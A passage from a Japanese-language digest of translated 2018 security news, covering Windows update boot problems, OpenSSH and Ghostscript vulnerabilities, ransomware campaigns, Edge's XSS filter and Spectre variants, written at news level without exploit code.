     SandboxEscaperは、この脆弱性をMicrosoftに通知していない。これは、このフローのパッチが存在していないことを意味している。現在、全てのWindowsユーザに脆弱性がある。
     Microsoftの次の定例パッチは9月11日(次のPatch Tuesday)にスケジュールされている。
     この研究者は、この脆弱性を公開した後、彼もしくは彼女のTwitterアカウントを削除している。


    Windows 10 KB4100347 Intel CPU Updateがブート問題を発生している。また、AMDユーザにも強く求めていた
    BleepingComputer : News>Security (2018/08/27)
     8月21日、Microsoftは、5月にリリースしたWindows 10とWindows Server 2016用のKB4100347セキュリティ・アップデートのアップデートをリリースした。このアップデートは、Spectre脆弱性を軽減するIntel CPUマイクロコード・アップデートを含んでいる。このバージョンをインストールした後、ユーザは、Windows 10が適切に起動することができなくなった、あるいはパフォーマンスに問題が発生したと報告し続けている。この問題を更に複雑にしているのは、このIntel CPUアップデートが、AMDプロセッサのユーザにも強要されていたことにある。
     Microsofstは、2018年7月24日以来このサポート記事を更新していないので、8月21日のKB4100347で何が変更されたのか不明である。我々が認識していることは、このアップデートがWindows Updateを介して提供されて以来、Windows 10マシンが起動しなくなった、無限自動修復ループに陥った、あるいは、Choromeや他のアプリケーションで音楽を再生したときパフォーマンスの問題が発生したという多大なレポートである。
     Redditへの投稿によると、ある管理者はXeonプロセッサを使用している殆どのワークステーションに影響を与えるブート問題と理解しているが、他のレポートは、Intel i3, i5, i7プロセッサでも同様に問題を発生していると表明している。


    KB4100347アップデートに関するRedditの投稿

     上のRedditへの投稿はまた、ブートができなくなったシステムに関してWindows Recovery Environmentを使用して、このアップデートを削除する方法も提供している。Windowsはブートできるがパフォーマンス問題を持っている人に関しては、このアップデートをアンインストールし、これが助けになるか否か確認することができる。
     このマイクロコード・アップデートを更に混乱させているのは、5月のアップデートをインストールし、更に最新の8月のアップデートをインストールした人は、KB4100347アップデートが、アップデートの履歴に二つ表示されていることである。


    KB4100347が二つ表示されている画面(Microsoft Forumsから)

    AMDプロセッサのユーザもIntelマイクロコード・アップデートを提供されている

     AMDユーザも仲間はずれにされていなかった。Redditへの投稿によると、KB4100347はIntelプロセッサ用に設計されているが、Windows Updateは、AMDプロセッサを使用しているコンピュータに関しても、このアップデートをインストールしている。
     AMDユーザは、Intelプロセッサを使用している人々と同じ問題に悩まされていないようであるが、MicrosoftはAMDユーザとサポート対象外のIntelプロセッサの使用者にこのアップデートを強要する誤りを犯しているかのようである。
     Bleeping ComputerはMicrosoftに接触し、このアップデートに関する質問をしたが、この記事を公開する時点に於いて回答は得られていない。


    Windows 95がWindows, macOS, Linux用のアプリケーションとして利用可能になった
    BleepingComputer : News>Security (2018/08/23)
     Slackのソフトウェア・エンジニアFelix Riesebergが、Windows, macOS, Linux用のアプリケーションとしてWindows 95をリリースした。これは100MBのElectronアプリケーションであり、Windows, macOS, Linuxコンピュータにインストールし実行することができる。
     GitHubへの投稿で、開発者Felix Riesebergは、この新しいElectronアプリケーションをインストールし実行することで、完全なWindows 95を得ることができるだろうと説明している。このWindows 95 Electronアプリケーションのサイズは、凡そ100MBであり、Windows 10デバイス上で実際に良好に動作している。


    Windows 95

     「私は、Windows 95をmacOS, Windows, Linuxで動作するElectronアプリケーションにした。このとんでもないアイデアは驚くほど上手く動作する」と、開発者Felix RiesebergはTweetしている。
     興味があるのなら、Windows, Mac, Linux用のWindows 95 Electronアプリケーション・パッケージをダウンロードするためにGitHubのページを訪問しなさい。Windowsコンピュータを持っているのであれば、Windows 95 Setup exeをダウンロードする必要がある。使用するにはこのアプリケーションをダブルクリックしなさい。数分で、あなたのコンピュータは、フル機能のWindows 95オペレーション・システムを実行するだろう。


    Adobe: Photoshop CC中の予想外の「緊急」の修正をリリース
    Sophos : Naked Security (2018/08/23)
     Adobeの月例のパッチから僅か1週間、Adobeは、WindowsとmacOS用のPhotoshop Creative Cloud (CC)に影響を与える二つの緊急の脆弱性の急を要する修正をリリースすることになった。
     これは多分、定例外(通常、積極的に悪用されている脆弱性に関して予約されている)と言うより予期しなかったものとして認定されるが、Photoshop CCのユーザは、適当な期間内にこれらの修正を適用すべきである。
     この脆弱性のあるバージョンは、WindowsもmacOSも共にPhotoshop CC 2018 v19.1.5 及び それ以前のバージョンと、Photoshop CC 2017 v18.1.5 及び それ以前のバージョンである。
     このアップデートされたバージョンは、Photoshop CC 2018 v19.1.6 と Photoshop CC 2017 v18.1.6である。この脆弱性は、Adobe識別子APSB18-28の下にCVE-2018-12810CVE-2018-12811として参照される。アップデートは、ヘルプ>アップデート で適用される。
     FortinetのKushal Arvind ShahによってAdobeに通知されたこのバグは、悪意あるファイルによって引き起こされるものであり、脆弱性のカテゴリとしてはメモリ損壊、脆弱性の影響としてはリモートコード実行(RCE)という事実を除いて詳細は未だ明らかになっていない。

    Adobeセキュリティ・ブレティンの説明

     悪用が成功すると現在のユーザのコンテキスト中で任意のコード実行が発生する。

     この修正は、僅か優先度3であるにも拘わらず「緊急」に評価されている。これに関するAdobeの見解が以下である。

     このアップデートは、製品中の今まで攻撃者によって標的とされていなかった脆弱性を解決する。Adobeは管理者の判断でこのアップデートをインストールするように推奨する。

     Photoshop CCの最後の重要な修正は、CVE-2018-4946の解決として5月にリリースされたが、先週のパッチ群は、Windows用のCreative Cloud Desktop Applicationインストーラ(バージョン4.5.0.324 及び それ以前)中のフローをパッチしたCVE-2018-5003を含んでいた。
     Photoshop CCをパッチすることが仕事のように感じるのであれば、Flash Playerのことを検討してみなさい。未だFlash Playerを稼働しているマゾヒストの方々へ、2018年に於いて、Adobeは19個のCVE(先月の修正分を含む)を作成している、そして、まだ8月である。


    過去20年間にリリースされた全てのOpenSSHのバージョンに影響を与える脆弱性
    BleepingComputer : News>Security (2018/08/22)
     この脆弱性は、過去20年間(このアプリケーションが1999年にリリースされて以来)にリリースされたOpenSSHクライアントの全てのバージョンに影響を与える。
     このセキュリティバグは、今週パッチを受け取ったが、OpenSSHクライアントは多数のソフトウェアやハードウェア・デバイスに埋め込まれているので、影響を受ける全てのシステムに、この修正が行き渡るには数年はかからなくとも数ヶ月はかかるだろう。

    OpenSSHで発見されたユーザ名列挙型のバグ

     この特定のバグは、OpenBSDのOpenSSHソースコード中にコミット(【訳註】 データベースの更新処理を正常に完了させて更新内容を確定させることを「コミットする」という(実用日本語表現辞典より))を見つけたQualysのセキュリティ研究者によって先週発見された
     このコミットを解析した後、研究者達は、このコードが、作成以来OpenSSHクライアント中で深い眠りについていたセキュリティバグを偶発的に修正したことを明らかにした。
     このバグは、リモート攻撃者がOpenSSHサーバ上に登録されているユーザ名を推測することを可能にする。OpenSSHは、クラウド・ホスティングサーバからマンデートIoTに至るまでの数多くの技術範囲で使用されているため、数十億のデバイスに影響を与える。
     研究者の説明では、この攻撃シナリオは、不正な認証要求(例えば、切り詰められたパケット)を介してOpenSSHエンドポイントで認証しようとする攻撃者に依存している。
     脆弱性のあるOpenSSHサーバは、これが発生したとき、大きく異なる二つの方法で反応する。不正な認証中に含まれているユーザ名が存在しない場合、このサーバは認証失敗を返すことで対応する。ユーザ名が存在した場合には、このサーバは、何も戻さずに接続を閉じる。
     この簡単な挙動に関する説明は、攻撃者がSSHサーバに登録されている正当なユーザ名を推測することを可能にする。実在するユーザ名を知ることは、即座に危険を引き起こさないかもしれなが、ブルートフォースや辞書攻撃(【訳註】 パスワードの割り出しや暗号の解読に使われる攻撃手法で辞書にある単語を使う方法のこと(セコムトラストシステムズより))でそのユーザ名は、そのパスワードを推測することができる。
     OpenSSHはインストールベースで膨大な数に上るため、このバグは高い価値を持つ標的への攻撃だけでなく、大量攻撃のシナリオでも理想的なものである。

    バグは先週パッチされた。「概念の実証」(PoC)コードはオンライン上にある

     このバグ(CVE-2018-15473として追跡される)は、OpenSSHの安定版(1:6.7p1-1 と 1:7.7p1-1)と不安定版(1:7.7p1-4)でパッチされた。このパッチは、Debianおよび、十中八九他のLinuxディストリビューションに行き渡っている。
     サーバに脆弱性があるか否かをテストするための「概念の実証」コードは様々な場所(1, 23)で利用可能になっている。

    Justin GardnerのTwitterへのリンク

     NVISO LabsのDidier Stevensは、このバグに対してサーバをテストするためのステップ・バイ・ステップのチュートリアルを公開した。このブログは、脆弱性あるサーバに対するこのバグの悪用の企てを暴く可能性のあるOpenSSHイベントをログする情報を含んでいる。

    軽減策も利用可能である

     諸般の事情からパッチをインストールできないシステム管理者は、様々な軽減策(OpenSSH認証を無効化する、あるいは、リモートデバイスにログインするための代替方法を使用したりするような)を適用することができる。
     これが、オプションではなく、OpenSSHクライアントがデバイスに接続する唯一の方法であるなら、システム管理者は、OpenSSHの"public key authentication"(公開鍵認証)方法を無効にすることができる。ここが、脆弱なコードが存在している場所である。
     これは、システム管理者がOpenSSHの認証鍵を使用不可能にすることを意味しているので、デバイス上のOpenSSHを介してログインする度にユーザ名とパスワードを入力しなければならなくなるだろう。


    Ghostscriptインタープリター中に新しく重大な脆弱性。パッチは未だ利用可能になっていない
    BleepingComputer : News>Security (2018/08/22)
     Tavis Ormandy(Google Project Zeroのセキュリティ研究者)は、Ghostscript(AdobeのPostscriptとPDFページ記述言語用インタープリター)中に発見された新しく重大な脆弱性に関する詳細を明かにした。
     Ghostscriptは、その種類で最も広汎に使用されているソリューションである。Ghostscriptインタープリターは、数百の統合型ソフトウェアや、デスクトップ・ソフトウェアやWebサーバーがPostScriptやPDFベースのドキュメントを取り扱うことを可能にするコーディング・ライブラリに埋め込まれている。
     例えば、あなたは、ImageMagick, Evince, GIMP, すべてのPDF編集ソフトや視聴用ソフトウェアの内部TにGhostscriptを見出すだろう。

    バグの悪用はリモート・システムの乗っ取りを引き起こす

     Ormandyが発見したバグの悪用は、攻撃者が悪性化されたPostScript, PDF, EPS, もしくはXPSファイルを犠牲者に送信することを要求する。このファイルがGhostscriptインタープリターに辿り着くと、内部に含まれている悪意あるコードは、そのマシン上で攻撃者が求めていることを実行する。
     この脆弱性(CVE識別子は未だ取得されていない)は、攻撃者がGhostscriptの脆弱性のあるバージョンを使用しているアプリケーションやサーバを乗っ取ることを可能にする。
     記述している時点で、未だ修正は利用可能になっていない。
     圧倒的に、最も影響を受けるプロジェクトは、ImageMagicイメージ・プロセス・ライブラリであるが、このライブラリをDefaultで出荷している多くのLinuxディストリビューションもまた影響を受ける。本日リリースされたCERT/CCセキュリティ・アドバイザリによれば、RedHatとUbuntuは、彼らが影響を受けるということを既に確認している。
     「私は、[Linux]ディストリビューションが、[ImageMagick's] policy.xml中のPS, EPS, PDF, XPSコーダーをDefaultで無効にすることを強く推奨する」と、Ormandyは述べている。

     Tavis OrmandyのTwitter 8月21日

    Ghostscriptのバグは危険であり大変引く手数多である

     Ghostscriptは、Web開発やソフトウェア開発コミュニティーで広範に採用されているため、過去数年間Ghostscriptに目を向けてきた。
     彼は、2016年に、そして、2017年に再びGhostscriptに影響する類似の大変深刻な問題を発見している。
     彼が、2017年に発見した脆弱性(CVE-2017-8291)は、北朝鮮のハッカー集団(韓国の仮想通貨交換所に侵入し、資金を盗み、その後、中国語圏の攻撃者グループのハッキングに見せかけるように偽のフラグを植え付けた)によって採用されていた。
     Ghostscriptが広汎に採用されているために、あらゆるバグ、とりわけリモートコード実行を引き起こすバグは、あらゆる脅威をもたらすグループによって大変引く手数多である。


    研究者によると、仮想通貨交換所はセキュリティを完全に保証していない
    Bitdefender : Hot for Security (2018/08/09)
     2017年、多くのリスクテイカー(危険を冒す人)がBitcoinの波に乗って小さな富を成し遂げたが、一部の人は、アカウントをハックされ、仮想通貨の財布を空にされ涙で終わっている。このような不運な出来事に関して、仮想通貨ウォレットの所有者を非難する誘惑にかられるかもしれないが、ことはそのように単純ではない。
     仮想通貨交換所からの二年分のデータリークの調査は、ハッカーが仮想通貨交換サービスをハッキングすることに苦労していないことを明らかにしている。格好の事例は、6月に韓国のCoinrailで、凡そ2800万ポンド(3600万ドル)がハッカーの手に落ちた事件である。仮想通貨の支持者達は、このサイバー攻撃が即座にBitcoinの価値を10%下落させたことを思い出すだろう。
    2016年から2017年に、Group-IB(【訳註】 ロシアに本部を置くハイテク犯罪やオンライン詐欺を防止し調査するリーディングカンパニーの一つ(ホームページより))は、仮想通貨関連のデータリークが、369%まで上昇し、2018年の1月に記録を打ち立てていたことを発見した
     「仮想通貨とブロックチェイン産業への関心の増大に起因して、1月、事件の数は、2017年の月平均に比較して689%に跳ね上がった」と、研究者は発言している。
     アメリカ、ロシア、中国が主たるターゲットである、そして、この攻撃の第三位にランクされる犠牲者はアメリカ人である。米国は仮想通貨ハッカーに属している犯罪C&Cサーバ(コマンド・アンド・コントロール サーバ)の56.1%をホストさせている。以下、オランダ(21.5%)、ウクライナ(4.3%)、ロシア(3.2%)と続いている。
     攻撃者は、単純なソーシャル・エンジニアリングから、AZORult、Pony Formgrabber、Qbotのようなツールを活用したより複雑なトロイの配備に至る範囲のテクニックを使用している。サイバー犯罪者はまた、今まで銀行攻撃に使用されていたツールを別の目的で使用している。
     何故、仮想通貨交換所が、このように無防備なのか?
     研究者によると、この答えは、信じられていることより単純である。即ち、「情報セキュリティを無視し、サイバー犯罪者の能力を過小評価している。 第1で且つ主な原因は、ユーザと取引所の双方が二要素認証を使用していないことである。 第2の原因は、複雑でユニークなパスワードの使用など、基本的なセキュリティルールを無視していることである。」
     720のアカウントの解析から、Group-IBは、アカウントの1/5が8文字以下のパスワードを使用していることを発見した。脆弱なパスワードが、ブルートフォース攻撃を成功させることを考慮すると、危険な実装と言わざるをえない。
     ハックされた他の交換所(Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniexを含む)での事件を解析した後、研究者は以下の結論を導いている。
     「規模や実績に関係なく、現在、ユーザに絶対的なセキュリティを保証している仮想通貨交換所は存在していない。」
     この身も凍るような結論だけで、Bitcoinの流行に乗って高価な商品を販売した人達の背筋をゾッとさせるはずである。さもなければ、少なくとも、彼らに、より強力なパスワードを設定するよう促さなければならない。
     他の攻撃は、以下(ソフトウェアのソースコード中のエラー、フィッシング攻撃、ユーザデータベースへの不正アクセス、ストレージに関連した脆弱性、資金の引き出し)を含むことが研究者によって同定された。
     「しかしながら、それらの全ては、情報セキュリティとデジタル資産の保護への関心の欠如に由来している」と、研究者は強調している。
     仮想通貨交換所に関する限り、彼らが実行しているビジネスの種類と、違反が彼らの顧客の生活にどのように影響を与えるのかということを考慮すると、二要素認証は、顧客のアカウントを保護するための必要最低限である。残念ながら、仮想通貨交換所のどれもが、この実装を実施していないと、研究者は明らかにしている。


    危険警告: FCM#135(Full Circle Magazine Issue 135)サイト・リダイレクト
    Full Circle Magazine : WebSite (2018/07/28)
     Full Circle Magazine Issue 135は、昨日リリースされるはずだったが、私はリリースを控えている。これは、このサイトが(またも)リダイレクトに感染させられたからである。そこで、どうかスパムサイト(このサイトの末尾は、.tkである。私はフルネームでそれらの名前を見るという楽しみのために、そのようなサイトには行かない)にクリックスルー(【訳註】 ハイパーリンク(とりわけ、広告)をクリックしてスパムサイトのようなWebサイトに移動すること)しないでください。そのサイトは、フロント・ページ上のリンクをクリックすれば見ることができる。
     FCMを発行しているページは依然として安全なので、直接ダウンロードすることはできる(例えば、fullcirclemagazine.org/issue-134)。
     Lucasは、バケーションの最中であるが、このサイトを修正しようとして奮闘中である。我々はまた、全く新しいサイトの設計とWordPressを放棄することを検討中である。我々は試行し、この種の問題を停止する幾つかの準備をしている(その一つは、ホスト端末でのスキャンである)。しかし、我々は未だ問題を持っている。
     FCM#135は、Lucasが問題の根源に達したらリリースされるだろう。リリースされたら直ちにeMailを受け取るには、メーリングリストに参加されたい。


    Bitdefenderが、LockCrypt身代金要求型マルウェアの古いバージョンの復号ツールをリリースした
    BleepingComputer : News>Security (2018/07/21)
     ルーマニアのアンチウィルス企業Bitdefenderが昨日、LockCrypt身代金要求型マルウェアの古いバージョン(.1btc 拡張子でファイルをロックしているバージョン)によって暗号化されたファイルを復元する復号ツールをリリースした。
     LockCrypt身代金要求型マルウェアのこのバージョンは、2018年2月から5月末までアクティブであった。その後、この開発者は、.BI_D 拡張子でファイルをロックする新しいバージョンを開発している。
     このBitdefender復号ツールは、LockCrypt身代金要求型マルウェアの現在のバージョンに関しては役に立たないが、.1btcで暗号化されているファイルのコピーを未だ持っているユーザは、ファイルを復元するために、このツールを使用することができる。このツールのインターフェースは一目瞭然なので、使用方法は大変分り易い。
     BitdefenderチームがLockCryptの暗号化をクラックできたのは驚くにあたらない。LockCrypt身代金要求型マルウェアは、酷い暗号化を使用していることで知られている。Malwarebytesは、4月のレポートで、この身代金要求型マルウェアの欠陥ある暗号化ルーチンを説明している。
     セキュリティ研究者Michael Gillespieは、一年以上に渡り、LockCrypt身代金要求型マルウェアの複数のバージョンで暗号化されたファイルを復号するための支援を続けてきている。
                            
    LockyCryptのバージョン 状況
    .BI_D復号できない
    .1btcBitdefenderツールで復号可能
    .lock復号可能(Michael Gillespieにコンタクトしなさい)
    .2018復号可能(Michael Gillespieにコンタクトしなさい)
    .mich復号可能(Michael Gillespieにコンタクトしなさい)
     LockyCrypt身代金要求型マルウェアは、ハッカーがRDP接続を介して企業のネットワークに侵入するためにブルートフォース攻撃を使用した後に犠牲者に感染し、次に、手動でこの身代金要求型マルウェアのバイナリを実行する身代金要求型マルウェア(ランサムウェア)株である。
     この身代金要求型マルウェアは、2017年6月に最初に発見された。セキュリティ研究者は、Satan Ransomware-as-a-Service(【訳註】 知識を持つサイバー犯罪者が、ランサムウェアを利用した自作のサービスを「Ransomware as a Service(RaaS)」として、新人や志望者向け材料キットの形で提供すること(トレンドマイクロ・セキュリティブログより))ポータル上で以前活動していたグループ中にその製作者を追跡した


    Microsoft EdgeのXSSフィルターは壊れているようである
    BleepingComputer : News>Security (2018/07/21)
     サイバーセキュリティ企業PortSwiggerのセキュリティ研究者Gareth Heyesによると、Microsoft Edgeに含まれているセキュリティ機能は、動作を停止していたようである。
     疑問視されているセキュリティ機能は、"XSS Filter"であり、これは、ブラウザ内部で基本的なクロスサイトスクリプティング(XSS)攻撃を妨げるMicrosoftが開発したセキュリティ・メカニズムである。
     Microsoftは、2008年にXSS Filterを開発し稼働した。この機能は、Internet Explorer 8に最初に搭載されたが、Edgeで拡張され、Google ChromeやSafariのような他のブラウザにも配備された。

    XSS Filterの動作方法

     このセキュリティ機能は、"X-XSS-Protection"として知られている。この名前で知られている理由は、Webサイトのオーナが、彼らのサイトを提供するサーバに"X-XSS-Protection"と名付けられたHTTPヘッダーを構築することができるからである。
     ブラウザが、これらのサイトのページをロードし、このヘッダーを検出した時、ブラウザは、そのヘッダーの値に準拠してXSS Filterプロテクションを実行する。ヘッダーの値を以下に示す。

    X-XSS-Protection: 0
    X-XSS-Protection: 1
    X-XSS-Protection: 1; mode=block

     ブラウザが、"X-XSS-Protection: 0"を確認すると、ブラウザは、XSS Filterプロテクションを無効にする。
     ブラウザが、"X-XSS-Protection: 1"を確認すると、ブラウザは、ページのコードを無害化(サニタイズ)し、XSS攻撃特有のパターンを削除する。
     ブラウザが、"X-XSS-Protection: 1; mode=block"を確認し、XSS攻撃特有のパターンを検出すると、ブラウザはそのページ上のあらゆるコンテンツのレンダリング(表示)をブロックする。
     ここ3年間(Edgeがリリースされて以来)、EdgeはDefaultの設定として二番目の値を使用してきた。これは、そのページがXSS-Protectionヘッダーを構築しているか否かに拘わらず、Edgeは、ロードされたあらゆるページのコードを無害化しようとしていたことを意味している。

    EdgeのXSS FilterはDefaultで起動していない

     今週、Heyesは、Edgeが、XSS Filter設定に関して思われているように挙動していないことを発見した。
     「このXSS Filterは、DefaultでONになっていなければならない」と、「しかしながら、現在、DefaultでOFFである。そして、あなたが、X-XSS-Protection: 1でONにした場合でさえ、OFFのままである」と、Heyesは発言している。
     全てのサイトに関して、XSS FilterがDefaultでOFFになっている理由は、MicrosoftやEdgeチームから公式のアナウンスがないので不明である。
     これはMicrosoftの意図的な再構成ではなく、バグであるように思われる。
     これは、この機能がInternet Explorer(Microsoftのもう一つのブラウザ)中で意図したように動作するためであり、Internet Explorerでは、今もなおDefaultでONである。Microsoftが、この機能を削除したいのであれば、彼らの二つのブラウザからこの機能を削除することになるだろう。
     更に、XSS Filterは、今もなおEdgeで有効にすることができるが、Webサイトが明確に三番目(最高度のセキュリティレベル設定、殆どのWebサイトのオーナーが使用することを回避している)を使用していると、この設定は、最終的にEdgeがサイトを表示することを妨げる。
     実際にこの機能が機能する唯一の方法は、あなたが、X-XSS-Protection: 1; mode=blockヘッダーを持っている時である」と、Heyesは記述している。
     Microsoftのスポークスマンは、Bleeping Computerの問い合わせに応答していない。Microsoftは、PortSwiggerが今週初めにコメントを求めた時、「共有するものは何もない」と発言している。

    XSS Filterを削除するケース

     しかし、PortSwiggerの研究者は、Microsoftが本当にその方向に進むのであれば、XSS Filterを削除することは良いアイデアかもしれないとして、多くのセキュリティ研究者がこの件で泣き喚かなくて良くなるだろうとして、彼らはXSS Filterを削除した場合を構築した。
     第一に、多くの研究者が、この機能をバイパスした。あるいは、基本的なブラウザで別の攻撃を実行する[1, 2, 3]ために、これを乱用した。
     第二に、Mozillaは、この機能のサポートを決して表明しておらず、この機能がクロスブラウザ対応のアンチ-XSSメカニズムになる可能性を妨げた。
     第三に、MDNポータル(Web機能に関する公式のドキュメンテーション・サイト)によると、このXSS機能は、以前のように重要なものではない。つまり、
     これらの防御は、サイトが、インラインJavaScriptの使用を無効にする強力なContent-Security-Policy(CSP、コンテンツセキュリティポリシー、【訳註】 クロスサイトスクリプティング (XSS) やデータインジェクション攻撃などのような、特定の種類の攻撃を検知し、影響を軽減するために追加できるセキュリティレイヤー(MDN web docsより))を実装している時には、モダン・ブラウザにとっては不必要なことが多いが、これらの防御は、未だにCSPをサポートしていない古いWebブラウザのユーザにとっては、依然として防御を提供することができるものである。
     第四に、この機能はしばしば、Webサイトのオーナーによって誤って理解され誤った設定がなされている。それ故、この機能はめったにその真価を発揮していない。
     それ故、これがバグであれ、Microsoftが作為的に無効化している場合であれ、この機能は、初めから殆ど支持者を持っていないようである。


    Magniber身代金要求型マルウェアは、他のアジア諸国をターゲットにするために韓国から拡散している
    BleepingComputer : News>Security (2018/07/16)
     9ヶ月に渡り韓国ユーザーだけをターゲットにしてきたMagniber身代金要求型マルウェアが、ターゲットの範囲を拡大し、今や、PCの言語設定が中国語圏(マカオ、中国、シンガポール)やマレー語圏(マレーシア、ブルネイ)になっているユーザにも感染する能力を持っている。
     この変更は、独立系セキュリティ研究者MalwareHunterによって、7月5日に最初に発見された。幾人のセキュリティ研究者と共にBleeping Computerは、この問題を監視していた。

    MalwareHunterTeamのTwitter
     長い間、韓国だけをターゲットにしてきたMagniber身代金要求型マルウェアは、今、世界的脅威である。ここ数日、我々は、台湾と香港で複数の犠牲者を、そして、他の国から数人の犠牲者を確認した。
     2018年7月5日 10:38

    Magniber身代金要求型マルウェアは今迄、韓国に居住するユーザと、その地域に特有のPC言語設定を持つユーザに関してのみファイルの暗号化を行ってきた。しかし、しばしば韓国ユーザは、海外旅行中や、韓国IPでプロキシを使用している間に感染させられている。
     セキュリティ研究者が数人の犠牲者を確認し、Magniberが他の国に拡散しているという結論に達した過去のある時点では、そのような誤った警告も存在した。

    韓国外への拡散が確認された

     しかし今回は、真実のようである。Malwarebytesの研究チームは、最近拡散と、この身代金要求型マルウェアのバイナリ中に重要な変更を発見した。
     このアメリカに本拠を置くアンチウィルスメーカーは、Magniberコード中に、韓国以外のユーザを追い求める新しいターゲットシステムに合致する変更を発見したと発言している。
     更に、全体のソースコードは今、より高品質なものになっていると、二人のMalwarebytes研究者は本日の技術的分析中で記述している。
     「ソースコードは、より洗練され、様々な複雑なテクニックを活用している。そして、もはやコマンド&コントロールサーバや、暗号化ルーチン用のハードコードされたキーに依存していない」と、この二人は発言している。

    Magnitude EKもまた、変更された

     これらの変更に関する理由は不明であるが、それらはまた、Magnitudeエクスプロイトキット(過去9ヶ月間、Magniber感染の唯一の供給源)にも影響を与えている。Magniberの"magni"は密接な関係を持つMagniberが由来である。
    Magniberに先立って、この同じエクスプロイトキットは、Cerber身代金要求型マルウェア(世界中の全てのユーザをターゲットにしたマルウェア株)でユーザに感染していた。
     新たに配布され、Magniberバージョンに改悪されたMagnitudeは、この身代金要求型マルウェアが今や、今迄のCerverバージョンと同じレベルの「品質」であることを示している。そして我々は、もっと多くの国々に拡散していることを徐々に確認することになるだろう。

    新しいMagniberキャンペーンは、以前のIEの0-Dayを使用している

    Malwarebytesによると、この新しく改悪されたMagniberバージョンを配備していることが確認されている最近のMagnitudeエクスプロイトキット・キャンペーンは、4月に発見され、5月にパッチされ、6月まで他のエクスプロイトキットによって採用されていたInternet Explorerの0-Dayを悪用している。
     我々が、今迄のストーリー中で説明してきたように、エクスプロイトキットは、モダンブラウザに対しては、むしろ失敗する。これは、Microsoftのブラウザ以外のブラウザをアップデートして利用しているユーザは、これらの攻撃からは安全なはずである。
     この最近のMagniberバージョンで暗号化されたファイルを所有するユーザは、ロックされたファイルの末尾に".dyaaghemy"拡張子が追加されていることで同定することができる。記述している時点で、Magniber身代金要求型マルウェアによって暗号化されたファイルを復元する方法は知られていない。


    明らかになった新たなSpectre 1.1、Spectre 1.2 CPUフロー
    BleepingComputer : News>Security (2018/07/11)
     二人のセキュリティ研究者が、二つの新しいSpectreに分類される脆弱性の詳細を明らかにした。彼らは、これらのフローをSpectre 1.1、Spectre 1.2と名付けている。
     今までの全てのMeltdownとSpectre CPUバグの異形と同様に、これら二つのフローは、投機的実行のプロセス(予めオペレーションをコンピューティングしておくことによってパフォーマンス改善し、その後、不要なデータを廃棄する役割を持つ全てのモダンCPU中で発見される機能)を利用するものである。

    Spectre 1.1、Spectre 1.2の簡単な説明

     研究者によると、Specter 1.1の攻撃は、投機的実行を使用し、CPUストアのキャッシュバッファをオーバーフローさせるコードを提供し、以前に確保されたCPUメモリセクションからデータを取得する悪意のあるコードの書き込みを実行する。
     Spectre 1.1はSpectreの異形1と4に大変類似しているが、このバグを発見した二人の研究者は、「現在、効果的な静的解析やコンパイラ・インスツルメントは、Spectre 1.1を一般的に検出し軽減するための役には立たない」と、発言している。
     Spectre 1.2に関して、このバグは、通常、リードオンリー・フラグによって保護されているCPUメモリセクターに書き込むことで悪用することができると、研究者は発言している。
     「(悪意あるSpectre 1.2書き込みの)結果として、サンドボックス化は、リードオンリー・メモリのハードウェア強制に依存しているため効果がなくなる」と、研究者は発言している。
     悪用するには、今迄の殆どのMeltdownとSpectreバグ同様に、この二つの脆弱性は、ユーザのPC上に悪意あるコード(攻撃を実行に責任を持っているコード)の存在を要求する。これは、これらのバグの深刻さを多少制限するが、パッチが利用可能になった時に、システム管理者がパッチの適用に失敗することは言い訳にならない。

    これらのバグは、Intel、ARM、そして、まず間違いなくAMDにも影響を与える

     IntelARMは、彼らのCPUの一部が、Spectre 1.1に脆弱性のあることを公に認めている。AMDは、声明を発表していないが、伝統的にセキュリティ問題の検証が緩慢である。全Spectre攻撃は、AMDのCPUに影響を与えているので、今回の新しい攻撃も、同様にAMDの製品群に影響を与えると仮定したほうが安全である。
     研究者は、Spectre 1.2に影響を受けるCPU情報をリリースしていない。現時点で、どちらのバグにも利用可能なパッチは存在していないが、MeltdownとSpectreフローの取り扱いに関するIntelのガイドは、脆弱性を緩和するために、アプリケーション・レベルで、開発者がどのようにソース・コードを検査し修正することができるかについての情報を含んでいる。
     Microsoft, Oracle, Red Hatは、彼らの製品によって取り扱われるデータがSpectre 1.1の影響を受けるか否か依然として調査中であると、ソフトウェア・レベルで、このリスクを緩和するための方法を検討中であると発言している。
     この論文(Speculative Buffer Overflows: Attacks and Defenses)において、これらのフローを発見した二人の学者は、Spectre 1.1攻撃とSpectre 1.2の一つを防御するためにハードウェア・ベースの緩和策を提案した。  Intelは、今研究チームに対して、Intelが最近稼働させたバグバウンティ・プログラム(脆弱性報奨金制度、オリジナルのMeltdownとSpectre脆弱性の発覚後にIntelが設立した)に基づき、このバグの発見に関し$100,000(約1100万円)の報奨金を支払った。これは、現在までに知られている最高額の報奨金の一つである。
     あなたが、最近のMeltdownとSpectre関連のバグを全て忘れているのであれば、我々は、あなたが全ての変種を把握するための役に立つよう以下のテーブルにまとめておく。                                                                                                                                                                
    変種 説明CVEコードネーム影響を受けるCPU詳細な情報
    Variant 1境界チェックバイパスCVE-2017-5753Spectre v1Intel, AMD, ARM Webサイト
    Variant 1.1ストア上の境界チェックバイパスCVE-2018-3693Spectre 1.1Intel, ARM 論文
    Variant 1.2読み取り専用の保護対策バイパス定められていないSpectre 1.2Intel, ARM 論文
    Variant 2分岐先の書き換えCVE-2017-5715Spectre v2Intel, ARM, AMD Webサイト
    Variant 3不正なキャッシュアクセスCVE-2017-5754MeltdownIntel Webサイト
    Variant 3a不正なシステム・レジスタの読み出しCVE-2018-3640Intel, ARM, AMD, IBM Mitre
    Variant 4投機的ストア・バイパスCVE-2018-3639SpectreNGIntel, ARM, AMD, IBM Microsoftブログ投稿


    ダウンロード爆弾(Download bomb)トリックは、Chromeに回帰しているが、Firefox, Opera, Vivaldi, Braveにも影響を与える。
    BleepingComputer : News>Security (2018/07/03)
     Google Chrome 67のリリースは、昨冬技術サポート詐欺師によって悪用された「ダウンロード爆弾」バグ(このバグは、2018年3月のChrome 65のリリースで修正されていた)を再び開いた。
     更に、この問題は、Bleeping Computerによって実行されたテストによって、他のブラウザ(Firefox, Opera, Vivaldi, Brave)にも同様に影響を与えるようである。

    回帰した「ダウンロード爆弾」トリック

     「ダウンロード爆弾」トリックは、特定のページでブラウザをフリーズさせるために数百もしくは数千のダウンロードを開始するテクニックである。
     数年に渡り、ダウンロード爆弾の複数の亜種が存在した。そして、それらは、しばしば、いかがわしいサイトにユーザを閉じ込め、ユーザのブラウザのロックを解除するには技術サポート番号に電話するように犠牲者を誘導するために技術サポート詐欺師によって使用された。
